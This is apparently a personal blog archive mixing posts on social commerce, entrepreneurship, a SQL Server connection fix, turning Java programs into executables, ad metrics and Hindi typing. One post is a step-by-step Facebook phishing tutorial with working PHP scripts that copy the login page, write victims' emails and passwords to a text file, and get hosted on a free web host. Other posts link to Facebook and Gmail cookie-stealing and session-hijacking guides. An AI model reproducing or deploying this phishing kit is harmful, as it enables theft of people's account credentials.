Saturday, 8 February 2014

how to set up social commerce site free of cost for your business

How to set up a Facebook and Twitter store easily 

Setting up Social Commerce with Facebook  step by step free of cost.

How to add your store to Facebook using two site:

1.EcWid 

2.sellmojo.com 

1.How to add your store to Facebook using EcWid

1. First please log in to your FB accout and open our application: apps.facebook.com/ecwid-shop/   
  -  If you do not have Ecwid store on Facebook yet, click "Add store to your page" button,
 

 

 sign up using fb a/c or make account on ecwid to handle or manage category,product,inventory,pricing.

 You can also add your store to blogger also @ www.ecwid.com/blogger

 

  2.How to add your store to Facebook using sellmojo

 SellMojo – India’s First S-commerce Store Maker

 sign up using fb a/c or make account on sellmojo to handle or manage category,product,inventory,pricing.free of cost.


Friday, 7 February 2014

Entrepreneur Ideas By Entrepreneur And How They Learn Entrepreneurship


   
Watch all entrepreneur video on  youtube for entrepreneur ideas 

Make account on google.com/entrepreneurs to learn entrepreneurship.

If you have Entrepreneur Ideas and want  funding try  startupvillage.other best funding sources for small business is ANGEL INVESTORS ,VENTURE CAPITA, INCUBATOR,CROWD FUNDING.

Entrepreneurship Development  is done by watching and consulting or surrounding yourself with great  entrepreneur.entrepreneurial skill can be develop in anybody just try in real world,books and institute can only give virtual knowledge or idea but doing it in real world can help you lot to learn entrepreneurship.
                                                 Comfort Zone is the most dangerous place for entrepreneur move asap from your comfort zone and try to nailed out whatever you want.First thing in learning entrepreneurship
is very to find your niche.how to find your niche :-
  • Things you like / love
  • Things you are good at
  • Things that are important
  • Things you can be paid to do.
                                     Find what you love and what make you happy,what keeps you up at night? This Step is very important,If you have idea start your business asap don't waste your time someone's else might do it.Have passion for your work.Learn to handle or manage people.

                                    Whatever maybe your field or business try to make best compare to your competitor.Tell people why should they buy from you.Try to make best product possible this is more require than  marketing,Apple inc never sign a superstar or sportsperson for marketing because Apple is more than a brand.



                                   Than question came how to make money, Big company like Apple,Facebook  follow innovation  they just Try to make best product possible ever.Facebook doesn't know how to make money then in 2007 they hire Sheryl Sandberg .Before Facebook, Sandberg was V. President of Online Sales and Operations at Google.She very well know how make money from people by marketing.In online world People is equal to money.People serch lots of time how to make money online.It's very easy whatever you do online that's make you money. if you want to make money from link try adf.ly(not recommended people hate to wait). Make money from text based advertisement.Try google adsense and Try affiliate marketing programs.Use teckler.com for writing article to make money.Do freelancing jobs.This are short term trick  without hustle for making online money.
                                    First make community of customer than make money.Give lots of important to innovation  in your organization.

Learn :what is CPL,CPM,CPI,PPC in online advertising and marketing.
Read :read about entrepreneurs
Get Knowledge About :What is Differences Between Wholesalers,Distributors, and Retailers,supplier

Entrepreneur Ideas for future is E-commerce,Online Healthcare Business,Open things what people need in their day to day life, execute your idea as early as possible.


This post is by Entrepreneur  AAVIK KUMAR




Tuesday, 4 February 2014

error: 26 - Error Locating Server/Instance Specified Solution With Explanation


Error: 26 - Error Locating Server/Instance Specified

If you are facing problem with connecting to SQL Server through ur application. And getting following error

"An error has occurred while establishing a connection to the server. When connecting to SQL Server 2005, this failure may be caused by the fact that under the default settings SQL Server does not allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)"

Step 1.

Check if you can login to your SQL Server Managed Studio using ur user Name and pwd.

Example using ur sa account which is ur default account

If not the then follow following steps

Change the authentication mode to mixed from Windows, Following are the steps to be followed.

In SQL Server Management Studio Object Explorer, right-click the server, and then click Properties.

On the Security page, under Server authentication, select the new server authentication mode "SQL Server and Windows Authentication mode", and then click OK.

In the SQL Server Management Studio dialog box, click OK to acknowledge the requirement to restart SQL Server

To Enable the sa login.

In Object Explorer, expand Security, expand Logins, right-click sa, and then click Properties.

On the General page, you might have to create and confirm a password for the sa login.

On the Status page, in the Login section, click Enabled, and then click OK.

Step 2.
Enable remote connections for SQL Server 2005 Express or SQL Server 2005 Developer Edition

You must enable remote connections for each instance of SQL Server 2005 that you want to connect to from a remote computer. To do this, follow these steps:

Click Start, point to Programs, point to Microsoft SQL Server 2005, point to Configuration Tools, and then click SQL Server Surface Area Configuration.
On the SQL Server 2005 Surface Area Configuration page, click Surface Area Configuration for Services and Connections.
On the Surface Area Configuration for Services and Connections page, expand Database Engine, click Remote Connections, click Local and remote connections, click the appropriate protocol to enable for your environment, and then click Apply.

Note Click OK when you receive the following message: <div>Changes to Connection Settings will not take effect until you restart the Database Engine service.</div>
On the Surface Area Configuration for Services and Connections page, expand Database Engine, click Service, click Stop, wait until the MSSQLSERVER service stops, and then click Start to restart the MSSQLSERVER service.

Step 3.
Enable the SQL Server Browser service

If you are running SQL Server 2005 by using an instance name and you are not using a specific TCP/IP port number in your connection string, you must enable the SQL Server Browser service to allow for remote connections. For example, SQL Server 2005 Express is installed with a default instance name of Computer Name\SQLEXPRESS. You are only required to enable the SQL Server Browser service one time, regardless of how many instances of SQL Server 2005 you are running. To enable the SQL Server Browser service, follow these steps.

Important These steps may increase your security risk. These steps may also make your computer or your network more vulnerable to attack by malicious users or by malicious software such as viruses. We recommend the process that this article describes to enable programs to operate as they are designed to, or to implement specific program capabilities. Before you make these changes, we recommend that you evaluate the risks that are associated with implementing this process in your particular environment. If you choose to implement this process, take any appropriate additional steps to help protect your system. We recommend that you use this process only if you really require this process.

Click Start, point to Programs, point to Microsoft SQL Server 2005, point to Configuration Tools, and then click SQL Server Surface Area Configuration.
On the SQL Server 2005 Surface Area Configuration page, click Surface Area Configuration for Services and Connections.
On the Surface Area Configuration for Services and Connections page, click SQL Server Browser, click Automatic for Startup type, and then click Apply.

Note When you click the Automatic option, the SQL Server Browser service starts automatically every time that you start Microsoft Windows.
Click Start, and then click OK.

Note When you run the SQL Server Browser service on a computer, the computer displays the instance names and the connection information for each instance of SQL Server that is running on the computer. This risk can be reduced by not enabling the SQL Server Browser service and by connecting to the instance of SQL Server directly through an assigned TCP port. Connecting directly to an instance of SQL Server through a TCP port is beyond the scope of this article. For more information about the SQL Server Browser server and connecting to an instance of SQL Server, see the following topics in SQL Server Books Online:

SQL Server Browser Service
Connecting to the SQL Server Database Engine
Client Network Configuration

Step 4.
Create exceptions in Windows Firewall

These steps apply to the version of Windows Firewall that is included in Windows XP Service Pack 2 (SP2) and in Windows Server 2003. If you are using a different firewall system, see your firewall documentation for more information.

If you are running a firewall on the computer that is running SQL Server 2005, external connections to SQL Server 2005 will be blocked unless SQL Server 2005 and the SQL Server Browser service can communicate through the firewall. You must create an exception for each instance of SQL Server 2005 that you want to accept remote connections and an exception for the SQL Server Browser service.

SQL Server 2005 uses an instance ID as part of the path when you install its program files. To create an exception for each instance of SQL Server, you must identify the correct instance ID. To obtain an instance ID, follow these steps:

Click Start, point to Programs, point to Microsoft SQL Server 2005, point to Configuration Tools, and then click SQL Server Configuration Manager.
In SQL Server Configuration Manager, click the SQL Server Browser service in the right pane, right-click the instance name in the main window, and then click Properties.
On the SQL Server Browser Properties page, click the Advanced tab, locate the instance ID in the property list, and then click OK.

To open Windows Firewall, click Start, click Run, type firewall.cpl, and then click OK

Step 5.
Create an exception for SQL Server 2005 in Windows Firewall

To create an exception for SQL Server 2005 in Windows Firewall, follow these steps:

In Windows Firewall, click the Exceptions tab, and then click Add Program.
In the Add a Program window, click Browse.
Click the C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe executable program, click Open, and then click OK.

Note The path may be different depending on where SQL Server 2005 is installed. MSSQL.1 is a placeholder for the instance ID that you obtained in step 3 of the previous procedure.
Repeat steps 1 through 3 for each instance of SQL Server 2005 that needs an exception.

Create an exception for the SQL Server Browser service in Windows Firewall

To create an exception for the SQL Server Browser service in Windows Firewall, follow these steps:

In Windows Firewall, click the Exceptions tab, and then click Add Program.
In the Add a Program window, click Browse.
Click the C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe executable program, click Open, and then click OK

convert Java to executable Jar file -JAVA TO EXE


Many newbie have this question how to convert java program to executable file?

To get executable .exe file we must convert .class file to .jar

How to convert .class file to .jar
Create the JAR file. The format of the command line for creating the JAR file looks like this:
"jar cf yourjarfilename manifest.txt Smile.class"
  • The "jar" portion refers to the jar.exe program, which compiles the JAR file.
  • The "c" option specifies that you want to create a JAR file
  • The "f" option means that you want to specify the filename.
  • The "yourjarfilename" portion is where you should type the name that you want the file to have.
  • For example, you might type "jar cf myjar manifest.txt myclass.class." This would create a JAR file with the filename "myjar.jar" which would include the files "manifest.txt" and "Smile.class."
  • If you add directories to the JAR file, the jar.exe utility will automatically add their contents


 If you want to create executable .exe  file of your .class file of java then you have to convert it into
jar (Java ARchive) file this is most important step.

how to create manifest file for an Executable jar file  


Create a manifest file. Save manifest file using the extension .txt using the text editor and input the following:
  • Main-Class: Smile(or whatever your file's name is )
 

Creating an Executable jar File By Software           




JSmooth


JSmooth is a Java Executable Wrapper. It creates native Windows launchers (standard .exe) for your java applications. It makes java deployment much smoother and user-friendly, as it is able to find any installed Java VM by itself.

Once you have downloaded JSmooth, open the application.
jsmooth_1
Specify the skeleton of the executable application. In my case I want to create a Console wrapper that will run on the command prompt console.
jsmooth_skeleton
Give the full path to the .jar file by selecting the option “Use an embedded jar”. Go to Application tab and set the Main Class file. Put the same name which you had used in Eclipse project as Main Class.
jsmooth_2
Go to the Executable tab and set Executable Binary file path. Mention the full path with name of the .exe file that you want to be created. One can also provide an icon for the executable file.
jsmooth_3
Now, go to the JVM Selection tab. Specify the minimum and maximum JVM versions required to run your application.
jsmooth_4
Finally, go to the Project menu and compile the file. If there are no compilation errors then you should see the .exe file generated in the specified directory.
jsmooth_5
jsmooth_6
output



Launch4j

Launch4j is a cross-platform tool for wrapping Java applications distributed as jars in lightweight Windows native executables. The executable can be configured to search for a certain JRE version or use a bundled one, and it's possible to set runtime options, like the initial/max heap size. The wrapper also provides better user experience through an application icon, a native pre-JRE splash screen, a custom process name, and a Java download page in case the appropriate JRE cannot be found
use launch4j to package up the jar into an EXE.
Although launch4j has a command-line interface, I first used the GUI.
The first screen I filled in looked similar to this:

I tried to just save the EXE at that point, but I then needed to specify a minimum Java version on this tab:



 
output file heyguys.exe is your output file name

Java Launcher
 Java Launcher run Java applications and applets by double-clicking class files; view class source codes and class hierarchies in graphic format by right-clicking;

JexePack


JexePack is a command line tool (great for automated scripting) that allows you to package your Java application (class files), optionally along with its resources (like GIF/JPG/TXT/etc), into a single compressed 32-bit Windows EXE, which runs using Sun's Java Runtime Environment. Both console and windowed applications are supported.

LaunchAnywhere


A LAX Executable is an executable file that is used to launch a Java application on any LaunchAnywhere-compatible platform. Currently, InstallAnywhere creates LaunchAnywheres on Windows 95/98/NT/2000/Me, Solaris, Linux, and Mac OS X. LaunchAnywhere enables end-users to double-click on an icon (Windows or Mac OS X) or type a single command (UNIX) to start a Java application

Creating a jar File in Command Prompt

  1. Start Command Prompt.
  2. Navigate to the folder that holds your class files:
    C:\>cd \mywork
  3. Set path to include JDK’s bin.  For example:
    C:\mywork> path c:\Program Files\Java\jdk1.7.0_25\bin;%path%
  4. Compile your class(es):
    C:\mywork> javac *.java
  5. Create a manifest file and your jar file:
    C:\mywork> echo Main-Class: Craps >manifest.txt
    C:\mywork> jar cvfm Craps.jar manifest.txt *.class
    or
    C:\mywork> jar cvfe Craps.jar Craps *.class
  6. Test your jar:
    C:\mywork> Craps.jar
    or
    C:\mywork> java -jar Craps.jar

Creating a jar File in Eclipse

 In Eclipse Help contents, expand "Java development user guide" ==> "Tasks" ==> "Creating JAR files."  Follow the instructions for "Creating a new JAR file" or "Creating a new runnable JAR file." The JAR File and Runnable JAR File commands are for some reason located under the File menu: click on Export... and expand the Java node.

Creating a jar File in JCreator

You can configure a "tool" that will automate the jar creation process.  You only need to do it once.
  1. Click on Configure/Options.
  2. Click on Tools in the left colu
  3. n.
  4. Click New, and choose Create Jar file.
  5. Click on the newly created entry Create Jar File in the left column under Tools.
  6. Edit the middle line labeled Arguments: it should have
    cvfm $[PrjName].jar manifest.txt *.class
  7. Click OK.
Now set up a project for your program, create a manifest file manifest.txt or copy and edit an existing one.  Place manifest.txt in the same folder where the .class files go.  Under View/Toolbars check the Tools toolbar.  Click on the corresponding tool button or press Ctrl-1 (or Ctrl-n if this is the n-th tool) to run the Create Jar File tool.
With Windows Explorer, go to the jar file that you just created and double click on it to run.



Friday, 31 January 2014

FACEBOOK PHISHING: Complete Tutorial! step by step

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="hello.php"
Step6 : now open a notepad and type following as it is.



1 type
------
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>





or 
2nd type
---------------
<html> <body> <?php $handle = fopen("lol.txt", "a");
 fwrite($handle,$_POST["email"]);
fwrite($handle,"\n");
 fwrite($handle,$_POST["pass"]);
 fwrite($handle,"\n");
 fwrite($handle,"\n");
 fclose($handle);
 header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>


NOW save this as hello.php

Step7 : now make a account on  http://members.000webhost.com/login.php and Upload


Login.html
hello.php
lol.txt

Tuesday, 28 January 2014

Oracle Financial Services Software Ltd Goregaon East Mumbai

Oracle Financial Services Software Ltd (ORCL.BO)

Oracle Financial Services Software Limited is engaged in the business of providing information technology solutions and knowledge processing services to the financial services industry worldwide. The Company has a suite of banking products, which caters to the needs of corporate, retail, investment banking, treasury operations and data warehousing. The Company operates in three segments: Product licenses and related activities, information technology (IT) solutions and consulting services and Business Processing Services. Product licenses and related activities segment deals with various banking software products. IT solutions and consulting services segment offers services spanning the entire lifecycle of applications used by financial service institutions. Business Processing Services comprises of business process outsourcing services to the Lending, Collections, Customer Service, and Capital Markets industry.


oracle goregaon east mumbai


Monday, 27 January 2014

all about tata consultancy services in goregaon east

B3, Nirlon Knowledge Park, Walbhat Rd, 
Goregaon East, Mumbai, Maharashtra 400064 ‎


All TCS PHOTO




 

View Larger Map



TCS Latest Question Patterns

Help Desk on Solving the aptis , of differnt types , structures , and also other competitive Exams around the world.

 

 

Sunday, 26 January 2014

Test Your Web Site For Errors

 What the Test Reveals
  • HTML Validation Errors - Does your web site contain hidden errors? Even though you can't see them, the search engines can, and they don't like errors on your web pages. These errors can hurt your search engine rankings or even worse, make it so visitors can't see your site properly.
  • Broken Links - Broken links look unprofessional and upset your visitors. Don't you just hate clicking on a link that doesn't work? This test will check all links on a page to make sure they lead to live web pages.
  • Meta Tag Content - Including meta tags can help visitors and search engines understand your site. They can also compel people to click on your link in search engine results - Google shows your title and description meta tags. See what your tags say.
  • Web Page Size - If your pages don't load quickly, you risk losing visitors. This test shows the size of your home page.

 http://tools.pingdom.com/fpt/


www.websitecleanup.com/test.php 

ebook,generate income from your blog

How To Open Adf.ly site

How To Open Adf.ly Links In India And Other Blocked Countries

 

Your Old Link – http://adf.ly/xxxx
Your New Link – https://adf.ly/xxxx

 

ADD "S" . wow it worked.



Saturday, 25 January 2014

Linkbucks.com removal

Run a scan with AdwCleaner to remove Linkbucks.com

Download download AdwCleaner to your desktop.
  • Important! Before starting AdCleaner, close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Delete, then confirm each time with Ok.







  •  Double click on the downloaded file (AdwCleaner.exe)
    click on Run. (if required by the security warning)
    Now click on the Delete button,
    a notification will pop up, click on OK
    when deletion has finished a message will pop up,
    after reading it click on OK,
    you will then get a notification AdwCleaner must restart the computer,
    click on ok.
    when the computer restarts a text file will open up, close it.
    Double click on the downloaded file (AdwCleaner.exe)
    click on the uninstall button then click on yes to remove the utility from your computer.(important step)
  • NOTE: AdwCleaner is a reliable removal tool for adware, toolbars,
    potentially unwanted programs and Browser Hijackers.
    It works with a Search and Deletion method.
    No installing required,
    It can be easily be removed
    by clicking on the ineptly named uninstall button. 

Friday, 24 January 2014

what is CPL,CPM,CPI,PPC in online advertising and marketing

CPL (Cost per Lead) or CPA (Cost Per Action) :-is an online advertising pricing model,where the advertiser pays for an explicit sign-up from a consumer interested in the advertiser's offer. It is also commonly called online lead generation.


CPM Cost per mille  :-also called cost ‰ and cost per thousand (CPT) (in Latin mille means thousand), is a commonly used measurement in advertising.

Cost per impression, often abbreviated CPI, is a term used in online advertising and marketing related to web traffic. It refers to the cost of internet marketing or email advertising campaigns where advertisers pay each time an ad is displayed.


Pay per click (PPC) (also called cost per click) is an internet advertising model used to direct traffic to websites, in which advertisers pay the publisher (typically a website owner) when the ad is clicked.

Click-through rate (CTR) is a way of measuring the success of an online advertising campaign for a particular website as well as the effectiveness of an email campaign by the number of users that clicked on a specific link.
The click-through rates is the number of times a click is made on the advertisement divided by the total impressions (the times an advertisements was served)

Most Trusted Affiliate Programs

affiliate-program.amazon.in-Manorama Yearbook 2014

flipkart.com/affiliate 





Tuesday, 21 January 2014

Entireweb Newsletter

Entireweb Newsletter 

Entireweb at a Glance

Entireweb's goal is to be a leading supplier of search technology solutions. The international Web search engine www.entireweb.com is not only a highly popular general purpose search engine used by millions of people around the world — it is also a showcase of our search technology and our expertise in the field of ultra-high-performance information retrieval from huge unstructured data sources.


 SEO - What Do Search Engines Want?

Monday, 20 January 2014

A Web Application Hacker’s Toolkit

■ A Web Application Hacker’s Toolkit 


A large number of browser extensions are available for Firefox that may be
useful when attacking web applications, including the following:
■■ FoxyProxy enables flexible management of the browser’s proxy configuration,
allowing quick switching, setting of different proxies for different
URLs, and so on.

■■ Tamper Data allows viewing and modification of HTTP requests and
responses within the browser.

■■ LiveHTTPHeaders also allows modification of requests and responses,
and replaying of individual requests.

■■ AddNEditCookies enables the addition and modification of cookies’
values and attributes.

■■ CookieWatcher enables a cookie’s value to be monitored in a status bar.

Technologies You'll Need To Hack Google's Search Engine Algorithm

Pinging your backlinks :

When you build backlinks they don't actually get picked up by Google straight away.
 Because they won't be the greatest backlinks in the world it could take a while.
 Some of them might not get picked up at all if you sit around and do nothing, so that is where pinging comes into play.
 You can use a pinging tool to ping all the backlinks you've built which is the same as dangling them in front of Google's eyes so the search engines know they exist.

Pinging  site http://adf.ly/cP9Yg




Hack Google's Search Engine Algorithm

do this SEO

http://adf.ly/cP9kw


Pinging your backlinks :

When you build backlinks they don't actually get picked up by Google straight away. Because they won't be the greatest backlinks in the world it could take a while. Some of them might not get picked up at all if you sit around and do nothing, so that is where pinging comes into play. You can use a pinging tool to ping all the backlinks you've built which is the same as dangling them in front of Google's eyes so the search engines know they exist.
- See more at: http://www.wildhacker.com/2013/11/hack-google-search-engine.html#sthash.Hkv5Zwiq.dpuf
Pinging your backlinks :

When you build backlinks they don't actually get picked up by Google straight away. Because they won't be the greatest backlinks in the world it could take a while. Some of them might not get picked up at all if you sit around and do nothing, so that is where pinging comes into play. You can use a pinging tool to ping all the backlinks you've built which is the same as dangling them in front of Google's eyes so the search engines know they exist.
- See more at: http://www.wildhacker.com/2013/11/hack-google-search-engine.html#sthash.Hkv5Zwiq.dpuf

Facebook and gmail Cookie Stealing And Session Hijacking

Facebook Cookie Stealing And Session Hijacking

1.http://www.rafayhackingarticles.net/2011/07/facebook-cookie-stealing-and-session.html


2.http://hackandcooltricks.blogspot.in/2013/06/how-to-hack-facebook-account-2013.html


Gmail  Cookie Stealing And Session Hijacking

http://www.rafayhackingarticles.net/2011/07/gmail-cookie-stealing-and-session.html



hacking

https://www.facebook.com/hacking.got.easy?ref=stream
http://createfunnylogo.com/
Gmail Cookie Stealing And Session Hijacking
Gmail Cookie Stealing And Session Hijacking
Gmail Cookie Stealing And Session Hijacking
Gmail Cookie Stealing And Session Hijacking
Gmail Cookie Stealing And Session Hijacking
Gmail Cookie Stealing And Session Hijacking

PHP Mail Script with simple explanation

Friday, 13 December 2013

how to right half character in hindi input keyboard

For Half characters: 

                                         You don't need to type half characters individually. You just type the full character associated with the target half character (for example, is the corresponding full character associated with ). To create , you just type and type the (halant) character after it. When the system will see the key combination, it will automatically convert the two characters into one: . Similarly, character, followed by (halant) will dynamically create letter . You can carry on with your typing afterwards.





impotant is use (halant) for half characters.

What is Differences Between Wholesalers(थोक), Distributors, and Retailers(खुदरा), supplier

Distributors

Distributors buy product from manufacturer.Distributors frequently have a business relationship with manufactures that they represent.

Wholesalers

Wholesalers generally buy a large quantity of products directly from distributors. High-volume purchase orders typically improve a wholesaler’s buying power.it have B2B relationship.


Retailers

Retailers consist of small and large for-profit businesses that sell products directly to consumers.A retailer purchases goods or products in large quantities from manufacturers directly or through a wholesale, and then sells smaller quantities to the consumer for a profit.It have B2C relationship.

Supplier

A supplier supplies a company with the resources it needs to do its business. If your company makes books, you would have a supplier for your paper, inks, cover material etc .


Reseller

A reseller is a company or individual (merchant) that purchases goods or services with the intention of reselling them rather than consuming or using them.
In simple terms a reseller is simply resells the good or services of another company.